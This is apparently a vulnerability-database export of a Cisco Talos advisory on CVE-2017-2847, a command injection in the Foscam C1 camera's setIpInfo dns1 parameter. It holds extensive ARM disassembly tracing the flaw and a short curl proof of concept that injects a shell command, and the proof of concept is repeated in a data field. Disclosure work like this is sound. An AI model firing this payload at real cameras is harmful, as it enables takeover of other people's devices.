R4\r\n.text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\r\n.text:00028FE0 09 00 A0 E1 MOV R0, R9\r\n.text:00028FE4 42 00 00 EA B leaving_290F4\r\n...\r\n.text:000290E0 04 00 A0 
E1 MOV R0, R4\r\n.text:000290E4 33 FF 2F E1 BLX R3 ; [9]\r\n.text:000290E8 05 00 A0 E1 MOV R0, R5\r\n.text:000290EC 00 00 00 EA B leaving_290F4\r\n...\r\n.text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\r\n.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\r\n```\r\n\r\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via dhcp or by manually setting an IP address, netmask, gateway and dns. At the beginning of the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and if it is, the the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if parameters are correctly parsed, -1 otherwise. The return value is passed via IPC via code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as result of the operation. 
Regardless the \"ip\" and \"mask\" parameters were parsed correctly or not, the execution will continue and another message is sent with code 0x601d via IPC [14].\r\n```\r\n.text:0003FF30 setIpInfo_37f30\r\n.text:0003FF30\r\n.text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n...\r\n.text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\r\n.text:0003FF58 BA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\r\n...\r\n.text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\r\n...\r\n.text:0003FF98 AA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\r\n...\r\n.text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\r\n...\r\n.text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\r\n...\r\n.text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\r\n...\r\n.text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFE0 1C 34 DD E5 LDRB R3, [SP,#0x4E0+var_C4] ; [11]\r\n.text:0003FFE4 00 00 53 E3 CMP R3, #0\r\n.text:0003FFE8 05 00 00 1A BNE loc_40004\r\n.text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\r\n.text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\r\n.text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\r\n.text:0003FFF8 00 00 50 E3 CMP R0, #0\r\n.text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\r\n.text:00040000 00 00 00 1A BNE loc_40008\r\n.text:00040004\r\n.text:00040004 loc_40004\r\n.text:00040004 00 20 A0 E3 MOV R2, #0\r\n.text:00040008\r\n.text:00040008 loc_40008\r\n...\r\n.text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\r\n...\r\n.text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\r\n...\r\n.text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\r\n```\r\n\r\nCode 0x601d is handled in 
the \"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts \"isDHCP\", ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurring threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\r\n```\r\n.text:0001A0AC OnDevMngMsgSetIpInfo_120ac\r\n.text:0001A0AC\r\n.text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\r\n...\r\n.text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\r\n\r\n\r\n.text:0003D880 sub_3D880\r\n.text:0003D880\r\n.text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\r\n...\r\n.text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\r\n.text:0003D89C 1A 00 00 0A BEQ loc_3D90C\r\n.text:0003D8A0 00 00 52 E3 CMP R2, #0\r\n...\r\n.text:0003D8BC 05 10 A0 E1 MOV R1, R5\r\n.text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\r\n.text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\r\n.text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\r\n.text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\r\n.text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\r\n.text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\r\n.text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\r\n.text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\r\n.text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\r\n.text:0003D8F0 95 52 FF 
EB BL std::string::operator=(std::string const&)\r\n.text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\r\n.text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\r\n.text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\r\n.text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\r\n...\r\n.text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\r\n\r\n... OnDevMngMsgSetIpInfo_120ac\r\n...\r\n.text:0001A144 01 00 70 E3 CMN R0, #1\r\n.text:0001A148 04 00 00 0A BEQ loc_1A160\r\n.text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\r\n...\r\n.text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\r\n\r\n.text:0003AAE4 sub_3AAE4\r\n...\r\n.text:0003AB08 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\r\n.text:0003ABD0 01 20 A0 E3 MOV R2, #1\r\n.text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\r\n```\r\n\r\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\r\n```\r\n.text:00042DE0 sub_42DE0\r\n.text:00042DE0\r\n.text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\r\n.text:00042DE4 00 40 A0 E1 MOV R4, R0\r\n.text:00042DE8 06 50 A0 E3 MOV R5, #6\r\n.text:00042DEC\r\n.text:00042DEC loc_42DEC\r\n.text:00042DEC 05 10 A0 E1 MOV R1, R5\r\n.text:00042DF0 04 00 A0 E1 MOV R0, R4\r\n.text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\r\n.text:00042DF8 00 10 A0 E1 MOV R1, R0\r\n.text:00042DFC 04 00 A0 E1 MOV R0, R4\r\n.text:00042E00 BE FE FF EB BL sub_42900 ; [22]\r\n.text:00042E04 00 50 A0 E1 MOV R5, R0\r\n.text:00042E08 04 00 9F E5 LDR R0, =0xF4240\r\n.text:00042E0C 51 3D FF EB BL usleep\r\n.text:00042E10 F5 FF FF EA B loc_42DEC ; loop\r\n```\r\n\r\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. 
As soon as its value is not 0, the function `sub_428E0` is called.\r\n```\r\n.text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\r\n.text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\r\n.text:00042D54 00 00 52 E3 CMP R2, #0\r\n.text:00042D58 04 00 00 0A BEQ loc_42D70\r\n.text:00042D5C 00 20 A0 E3 MOV R2, #0\r\n.text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\r\n.text:00042D64 04 00 A0 E1 MOV R0, R4\r\n.text:00042D68 05 10 A0 E1 MOV R1, R5\r\n.text:00042D6C DB FE FF EB BL sub_428E0\r\n```\r\n\r\nAt this point the execution will continue through many different calls; from a higher-level perspective, the following is the path that will be taken, stripped to only the interesting stubs (capital names are user-controlled strings):\r\n```\r\nsub_428E0\r\n sub_3FB2C\r\n sub_3B94C\r\n system(\"ifconfig eth0 0.0.0.0\")\r\n system(\"ifconfig ra0 up\")\r\n sub_3B8F0\r\n sub_3A95C\r\n system(\"rm -rf /var/run/wpa_supplicant\")\r\n system(\"ifconfig ra0 down\")\r\n system(\"killall wpa_supplicant\")\r\n sub_3B804\r\n system(\"ifconfig ra0 up\")\r\n sub_4286C\r\n sub_3E164\r\n system(\"ifconfig ra0 0.0.0.0\")\r\n system(\"ifconfig ra0 down\")\r\n sub_3D880\r\n system(\"killall udhcpc\")\r\n fork()\r\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\r\n system(\"killall -9 OnvifAgent\")\r\n```\r\n\r\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. 
User-supplied parameters are taken unmodified from a global structure. In this function the dns1 parameter [24] is never sanitized and is used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\r\n```\r\n.text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\r\n.text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\r\n.text:0003DF98 04 00 A0 E1 MOV R0, R4\r\n.text:0003DF9C 66 53 FF EB BL sprintf ; [25]\r\n.text:0003DFA0 A4 53 FF EB BL fork\r\n.text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\r\n.text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\r\n.text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\r\n.text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\r\n.text:0003DFB4 00 10 A0 E1 MOV R1, R0\r\n.text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\r\n.text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\r\n.text:0003DFC0 CC 53 FF EB BL execlp\r\n```\r\n\r\n### Exploit Proof-of-Concept\r\nThis vulnerability is reachable through the \"setIpInfo\" command and requires a valid user account with administrator privileges. 
The following proof of concept shows how to execute an arbitrary command.\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\r\n```\r\n\r\n### Timeline\r\n* 2017-05-30 - Vendor Disclosure\r\n* 2017-06-19 - Public Release\r\n\r\n### CREDIT\r\n* Discovered by Claudio Bozzato of Cisco Talos.", "modified": "2017-09-15T00:00:00", "published": "2017-09-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96495", "id": "SSV:96495", "type": "seebug", "title": "Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability(CVE-2017-2847)", "sourceData": "\n $ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\n ", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96495"}], "talos": [{"lastseen": "2019-05-29T19:20:15", "bulletinFamily": "info", "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0349\n\n## Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability\n\n##### June 19, 2017\n\n##### CVE Number\n\nCVE-2017-2847\n\n### Summary\n\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. 
A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\n\n### Tested Versions\n\nFoscam, Inc. Indoor IP Camera C1 Series\n \n \n System Firmware Version: 1.9.3.17\n Application Firmware Version: 2.52.2.37\n Web Version: 2.0.1.1\n Plug-In Version: 3.3.0.5\n \n\n### Product URLs\n\n[Foscam](<http://www.foscam.com/>)\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n### Details\n\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\n\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. 
An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\n \n \n .text:00009F20 FCGX_Init_1f20\n .text:00009F20\n .text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\n .text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\n .text:00009F28 08 D0 4D E2 SUB SP, SP, #8\n .text:00009F2C 05 FC FF EB BL FCGX_Init\n .text:00009F2C\n .text:00009F30 00 10 50 E2 SUBS R1, R0, #0\n .text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\n .text:00009F38 05 00 00 1A BNE leave_exit_1f54\n .text:00009F3C\n .text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\n .text:00009F40 01 20 A0 E1 MOV R2, R1\n .text:00009F44 1A FC FF EB BL FCGX_InitRequest\n .text:00009F48\n .text:00009F48 00 00 50 E3 CMP R0, #0\n .text:00009F4C 03 00 00 0A BEQ loc_9F60\n ...\n .text:00009F60 loc_9F60\n .text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\n \n .text:00009AD4 registerMsgClients_1ad4\n .text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\n .text:00009AD4\n .text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\n .text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\n .text:00009AE0 04 00 A0 E1 MOV R0, R4\n .text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\n .text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\n .text:00009AE8\n .text:00009AEC 04 00 A0 E1 MOV R0, R4\n .text:00009AF0 24 10 9F E5 LDR R1, =0x3001\n .text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\n .text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\n .text:00009AF8\n .text:00009AFC 04 00 A0 E1 MOV R0, R4\n .text:00009B00 18 10 9F E5 LDR R1, =0x3002\n .text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\n .text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\n .text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\n \n\nAfter the \"CGIProxy.fcgi\" service decodes an HTTP request 
that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\n \n \n .text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\n .text:00009FAC 08 10 A0 E1 MOV R1, R8\n .text:00009FB0 07 00 A0 E1 MOV R0, R7\n .text:00009FB4 34 FC FF EB BL strcpy ; [4]\n .text:00009FB8\n .text:00009FB8 08 00 A0 E1 MOV R0, R8\n .text:00009FBC C0 FB FF EB BL strlen\n .text:00009FC0\n .text:00009FC0 CC 30 9F E5 LDR R3, =0x404\n .text:00009FC4 00 30 8D E5 STR R3, [SP]\n .text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\n .text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\n .text:00009FD0 01 20 A0 E3 MOV R2, #1\n .text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\n .text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\n .text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\n .text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\n .text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\n .text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\n \n\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to `funcptr`. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. 
If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\n \n \n .text:0001E5A4 executeCGICmd\n .text:0001E5A4\n .text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\n .text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\n .text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\n .text:0001E5B0 00 80 A0 E1 MOV R8, R0\n .text:0001E5B4 06 10 A0 E1 MOV R1, R6\n .text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\n .text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\n \n .text:00028EAC sub_28EAC\n .text:00028EAC\n .text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\n .text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\n .text:00028EB4 00 80 A0 E1 MOV R8, R0\n .text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\n .text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\n .text:00028EC0 8B 00 00 0A BEQ leaving_290F4\n ...\n .text:00028F4C 00 00 50 E3 CMP R0, #0\n .text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\n ...\n .text:00028F88 findCmdCallback_28F88\n .text:00028F88 05 00 A0 E1 MOV R0, R5\n .text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\n .text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\n .text:00028F94 00 90 50 E2 SUBS R9, R0, #0\n .text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\n ...\n .text:00028FB8 checkIfAuthNeeded_28FB8\n .text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\n .text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\n .text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\n .text:00028FC4 02 00 51 E1 CMP R1, R2\n .text:00028FC8 06 00 00 1A BNE authenticate_28FE8\n ...\n .text:00028FD8 04 00 A0 E1 MOV R0, R4\n .text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\n .text:00028FE0 09 00 A0 E1 MOV R0, R9\n .text:00028FE4 42 00 00 EA B leaving_290F4\n ...\n .text:000290E0 04 00 A0 E1 MOV R0, R4\n .text:000290E4 33 FF 2F E1 BLX R3 ; [9]\n .text:000290E8 05 00 A0 E1 MOV R0, R5\n .text:000290EC 00 00 00 EA B leaving_290F4\n ...\n .text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\n 
.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\n \n\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via DHCP or by manually setting an IP address, netmask, gateway and DNS. At the beginning of the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and, if it is 0, the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if the parameters are correctly parsed, -1 otherwise. The return value is passed via IPC with code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as the result of the operation. Regardless of whether the \"ip\" and \"mask\" parameters were parsed correctly, the execution will continue and another message is sent with code 0x601d via IPC [14].\n \n \n .text:0003FF30 setIpInfo_37f30\n .text:0003FF30\n .text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\n ...\n .text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\n .text:0003FF58 BA A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\n ...\n .text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\n ...\n .text:0003FF98 AA A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\n ...\n .text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\n .text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\n ...\n .text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\n .text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\n ...\n .text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\n ...\n .text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\n .text:0003FFE0 1C 34 DD E5 LDRB R3, 
[SP,#0x4E0+var_C4] ; [11]\n .text:0003FFE4 00 00 53 E3 CMP R3, #0\n .text:0003FFE8 05 00 00 1A BNE loc_40004\n .text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\n .text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\n .text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\n .text:0003FFF8 00 00 50 E3 CMP R0, #0\n .text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\n .text:00040000 00 00 00 1A BNE loc_40008\n .text:00040004\n .text:00040004 loc_40004\n .text:00040004 00 20 A0 E3 MOV R2, #0\n .text:00040008\n .text:00040008 loc_40008\n ...\n .text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\n ...\n .text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\n ...\n .text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\n ...\n .text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\n ...\n .text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\n \n\nCode 0x601d is handled in the \"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts the \"isDHCP\", \"ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurrent threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. 
The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\n \n \n .text:0001A0AC OnDevMngMsgSetIpInfo_120ac\n .text:0001A0AC\n .text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\n ...\n .text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\n \n \n .text:0003D880 sub_3D880\n .text:0003D880\n .text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\n ...\n .text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\n .text:0003D89C 1A 00 00 0A BEQ loc_3D90C\n .text:0003D8A0 00 00 52 E3 CMP R2, #0\n ...\n .text:0003D8BC 05 10 A0 E1 MOV R1, R5\n .text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\n .text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\n .text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\n .text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\n .text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\n .text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\n .text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\n .text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\n .text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\n .text:0003D8F0 95 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\n .text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\n .text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\n .text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\n ...\n .text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\n \n ... 
OnDevMngMsgSetIpInfo_120ac\n ...\n .text:0001A144 01 00 70 E3 CMN R0, #1\n .text:0001A148 04 00 00 0A BEQ loc_1A160\n .text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\n ...\n .text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\n \n .text:0003AAE4 sub_3AAE4\n ...\n .text:0003AB08 00 40 A0 E1 MOV R4, R0\n ...\n .text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\n .text:0003ABD0 01 20 A0 E3 MOV R2, #1\n .text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\n \n\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\n \n \n .text:00042DE0 sub_42DE0\n .text:00042DE0\n .text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\n .text:00042DE4 00 40 A0 E1 MOV R4, R0\n .text:00042DE8 06 50 A0 E3 MOV R5, #6\n .text:00042DEC\n .text:00042DEC loc_42DEC\n .text:00042DEC 05 10 A0 E1 MOV R1, R5\n .text:00042DF0 04 00 A0 E1 MOV R0, R4\n .text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\n .text:00042DF8 00 10 A0 E1 MOV R1, R0\n .text:00042DFC 04 00 A0 E1 MOV 